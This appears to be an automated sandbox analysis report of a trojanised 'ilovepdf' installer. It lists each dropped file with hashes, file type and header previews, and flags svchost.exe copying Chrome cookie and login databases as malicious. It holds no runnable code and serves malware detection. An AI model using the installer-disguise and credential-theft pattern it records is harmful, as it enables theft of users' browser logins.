                                                                                  Preview: ....Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L...".".".'...".'....".'...".>.!.".>.'.".>.&."....".#..".&.+.".&.".".&..."...".&. .".Rich..".................PE..L.....da...........!................. ....................................................@..........................$......x%..(....p..................................8...................D...........@............................................text.../........................... ..`.rdata...[.......\..................@..@.data...<....0....... ..............@....tls.........P.......(..............@....gfids.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc...............0..............@..B........................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\th.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L..._.H...........!......... ........#.......#...............................#.......................................#.....L.#.......#.L.....................#.................................................................@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\ti.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):706560
                                                                                  Entropy (8bit):7.921985342568425
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:h+7aMyDxl1EputZ69u+sC4pdFANpBnNw7AMoFg8gb+CdofxMtauAjAMmyEDYHg36:hrVl1EpsZqQdSNpBnW7tPJeAlDYIqpv
                                                                                  MD5:19C9680AC9642A8105096ED9C1C5C71C
                                                                                  SHA1:1B4D55F5D372AB0E7532E2F4613BA1B767B4AC80
                                                                                  SHA-256:ABBFC12837B138DA3DC66D5D6032D1183FC947FBEEC22DF0EC71B6120FC1B769
                                                                                  SHA-512:2BCE8C3F3260E28D0B807C7EB1C1B271904FE45AE2D5366C47F6C72C13E070D40E1D5C6C00D37967DA0C33E3408CFDF6F23AFAC3975C8817030CF90F9355DC55
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\tt.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):921600
                                                                                  Entropy (8bit):7.929650404687928
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:9MIjKyNtCBdD3dMJ5QXWdWN2n3ROQ94EnNyYSsjHGHTnFha3sIvx7D+IE4uBwL8i:9fCXdwQGh74EniLHa3z5eaLo0L9K
                                                                                  MD5:814EF2BDB0199A7B950E3ECB650E9E29
                                                                                  SHA1:89460EE7A16E6682721E1C59D194DFBE05D35FD1
                                                                                  SHA-256:6F7D45E4ABEE103049E50E8BF9AB3E36B9C0D5044FDAB3B1B37766017ED5E4DF
                                                                                  SHA-512:90E082F14F677CC7C34D7F71623E9C86084E714F288F941C6603CE63DD2AA28A6B16959E5B3E9F849BFC0A82A6F8F9AC5F7D64E28AF310E373BF8ADD3610281E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):1209344
                                                                                  Entropy (8bit):7.922981354856275
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ngTRboPdLcaUHa3XRIXmpTpoCenCZjMRHIpU8OKhT6ZbKoD97ST5S0LX/68cBDk:nuo1LcFis8pSgUR4CuI97sS07/Nww
                                                                                  MD5:B4BFDBB19C4E1A089F51577D193A9F42
                                                                                  SHA1:3E6B4C547289BD39A84CD7A73A8FCFDF72C0C442
                                                                                  SHA-256:8549924223C77E4C52EC83E4BC2845FA9F7C571934423C27CA0D4BFED0EEB451
                                                                                  SHA-512:0D85E0AC1D65A92083523C32F275BBF40D1380B608551DACFA41037691FCE230FF1D6AF3E3B263BCC274D7C935581B0328563627A9D7EBFDE14B6E85F56416B4
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\unins000.dat
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2951
                                                                                  Entropy (8bit):3.4119433710230496
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:kxe5dyXdKrCy7d/didKdnudSdpUdjdVdQdtdVdNrCyrrCy4gNmMxeUhiwM4:kMuSCCRfCwCtJMHhiwM4
                                                                                  MD5:011C210BE28283E0C800446501515FF0
                                                                                  SHA1:11006311AD1D2E9A2F91EB5B946D390B7D435DFF
                                                                                  SHA-256:0AEE628B7EEEED16D39E22EB2B7CDEFDD2D9EAC7EDC83288AC3B805A71069BB3
                                                                                  SHA-512:AE15B20C9747045568920A09C5BDE0966D23EE94DD74F717A0D731D2196D283CFC1BCF1DE40FE77AA6A225800595D7B2CA6B634B075D88B480D35934841BD75D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: Inno Setup Uninstall Log (b)....................................{2CC7E4CF-1FD3-4C8C-8740-AB78A9B0E5D1}..........................................................................................ilovepdf....................................................................................................................................................................................................................................................7......D.............y........5.2.8.1.1.0......h.a.r.d.z......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f................1...... ........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f......C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.(.D.e.f.a.u.l.t.)......(.D.e.f.a.u.l.t.)......d.e.f.a.u.l.t.............D........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f........r........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.
                                                                                  C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3038269
                                                                                  Entropy (8bit):6.3798753919324795
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:nLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu/:FwSi0b67zeCzt0+yO3kSs
                                                                                  MD5:F6783D6BAD48D0F022DDB2C0A5819087
                                                                                  SHA1:FD1E4D2EBCC11D98ADAA75797527BA7E8DA5DC59
                                                                                  SHA-256:DAFBDF676A506C8743F4A93E81C927075101A172CBB8B3E8BCCF867D4D270B2B
                                                                                  SHA-512:67C53D7F3A0190E7A9B3FAD2B6E404EF7E0D67536210561B23F98C16C3EA4E4CEFEC8FF475FE318AA5C7466554E349ED5A6E5897576520A490346E7DAF02800A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Program Files (x86)\ilovepdf\update.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):178
                                                                                  Entropy (8bit):5.200654239805503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cFfdXP+FFFKMlFsPR4GXXyWRXlQFSLKbFUuAvF9IZZDKh+sWGXViKWVV9uMv:iV2FFFKMfsp7i22SLKbFUPvYWhpBFiZz
                                                                                  MD5:23872B81B308F0615E32E9EC60B8F806
                                                                                  SHA1:3989CA350F25FA4703573AD07AFBE99DECA43C98
                                                                                  SHA-256:BC528E642062193291745A32FFDF899BF420F556562BF18774B67615DF2A56E2
                                                                                  SHA-512:6357529877B355F724D390117FE19250344B7322098476D30F50D59381956345189E26DCB6618E610F0755C4C9819CAAC5D1323C82F3936FA028D7F3198C3A20
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <current Dat="1351852478" />.. <Dat Txt="&#x0A;What&apos;s New: We are waiting for your feedbacks -&gt; ||&#x0A;http://unipdf.com/support/&#x0A;" />..</config>..
                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1092
                                                                                  Entropy (8bit):4.61575992669859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzDUAcdOE7YPAzs8/dQqdgUUxDb7X7aB6m:8m3lQBdOrYYWdQqdV2b7mB6
                                                                                  MD5:E861D577008E1B9FEBCE77EF300048EA
                                                                                  SHA1:05FD7622DD8D3D71032EE7C506D34FC71FC9EFAA
                                                                                  SHA-256:1D24C9137FF7F9C6DEB8099F0BD4890FB65F4950FE867DFD29754CB3672AA7F1
                                                                                  SHA-512:8C8E6679A594E6881C45A06BAFE2EB33B7847E095284638BF3BD6D793DA4F0DCC4E5786E21817F6911E5154C1C33EE546955CF13395AC1ACD41A38FC103DBBD8
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....7Sxy..PROGRA~2.........L.XS......................V.....&*,.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..8.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6
                                                                                  C:\Users\Public\Desktop\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1080
                                                                                  Entropy (8bit):4.614976573469123
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzb+dOE7YPAzs8VdQqdgUUxDb7X7aB6m:8m3lb+dOrYYsdQqdV2b7mB6
                                                                                  MD5:4638B21A3E7FB47447EEC7FF96EB791B
                                                                                  SHA1:BB4D6C396116A23EC05C19305FF275C78C59D075
                                                                                  SHA-256:CE219A1BB80D87F8B08F4EAB99D1B5EE74F20A708D29B3AE85E953A460BF1156
                                                                                  SHA-512:5560E3769B53429DFA8F65839F0B26434B75876D74A851B68762E916FB744F3CB77B3EF2F11068C5B22A59B5F763414EA9C2F550BEE2E749AB8CE411C822C151
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....XS)...PROGRA~2.........L.XS,.....................V.....,...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..2.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35616
                                                                                  Entropy (8bit):6.953519176025623
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):6144
                                                                                  Entropy (8bit):4.720366600008286
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Process:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3014144
                                                                                  Entropy (8bit):6.393836278460701
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu:dwSi0b67zeCzt0+yO3kS
                                                                                  MD5:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  SHA1:695B2510981FFFCD62B9C0A6C86FED48A2C7F909
                                                                                  SHA-256:36BAFE4EDE8149A84EA4DA3F63B7982E7ACF849266418D8D6D1072FE244D32D6
                                                                                  SHA-512:2769A64798BC5285945F0608EC254B03808AD767A1830167A5DF5E7A963F5929C184694A54030C3B7EF4DFBD776412C85C8CBB1E6567D49D08A1F8B18CF7D418
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Windows\Installer\3cf0a5.msi
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):7306752
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  MD5:623673851FBB205EB0D1003CB892D4D6
                                                                                  SHA1:C541B4E10541BB0A6565BA8CC6B64D2480EF4437
                                                                                  SHA-256:71A98E982A9DDE0FFCF9A46554B7ABAF947AC4C33F3A3B35DF1A58B0064D0704
                                                                                  SHA-512:AE40BB582937B32C25E0A465CAC75106B04F6E0880CBF0E920F9C0DD80D7DD3E71A9C62BA8607375D7200675D4B4F18571745E00BD920418A662955E4BE23669
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ......................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...........C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e.......................................................................................
                                                                                  C:\Windows\Installer\MSIF681.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):7196926
                                                                                  Entropy (8bit):7.948610318777266
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:yTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY7:ymcTpRGZ3jtn1IShcc8YY7
                                                                                  MD5:24AFC545F42F59E3DB3B3FDA53371BEA
                                                                                  SHA1:B513ED9B64F1A95A631C483F8E08CAB612032764
                                                                                  SHA-256:EACA6FAFF890AA51B563F71E6EA9FAFD4130999234B757AE476B5E87757B7B38
                                                                                  SHA-512:8FABC38AA23E90D3A3CC41D992658C90D6FA4646CA7FA3F76D495C4D8F689C47DFFFF0571F7227032DE3E2191D4985C30E78E04F36BA743206E0C320CA8C5C41
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ...@IXOS.@.....@#fXS.@.....@.....@.....@.....@.....@......&.{D0D5A8D4-2C54-41FD-A0C3-50CC56973D60}..exe2msiSetupPackage..6rfyiAq0nM.msi.@.....@.....@.....@........&.{CDFF8FBF-8895-4382-936D-A20B4780ACE1}.....@.....@.....@.....@.......@.....@.....@.......@......exe2msiSetupPackage......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@......4.m.MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...........^.......p
                                                                                  C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7196212
                                                                                  Entropy (8bit):7.948679787500133
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:0TKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YYE:0mcTpRGZ3jtn1IShcc8YYE
                                                                                  MD5:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  SHA1:A46994CDACAD1C1C3C00E09F8DF12C9D6F8BC8AA
                                                                                  SHA-256:33ABF84C329A9C9691A7900059B2106CDD491976F0D5CCCC9CE493F4B7A4670C
                                                                                  SHA-512:6BD3A568588E61E04ED46D4EB67F85BA31ABC6B0FAD382F73A3C738C3A54543DB7E830ABFB1D1AFA8953D603966AE3E8E3AEEF324F58073E5363F7DCE8D844E2
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...........^.......p....@.......................................@......@...................@....... ..6....p...H...................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....H...p...H..................@..@....................................@..@........................................................
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):122558
                                                                                  Entropy (8bit):5.363511311327374
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4Hi:iHHJCoX5Ci
                                                                                  MD5:4C07CE11405369C87C0F2F0529DD1EDE
                                                                                  SHA1:42AC1D94AE42C4D575C1FC4F2C6A3D52933B004A
                                                                                  SHA-256:1FAAD6F0611922BAD2D21D65BA30CF396EFD76182BF56257AD27100405F8931D
                                                                                  SHA-512:222830B18EECB719372D3295E5A071BD44CB3CDC72780BF79904A4EEC5939B50A7FE42477D08C24A122C5C3F257C5A5113139D3A2A359A4DEE842E282B9A4D4A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
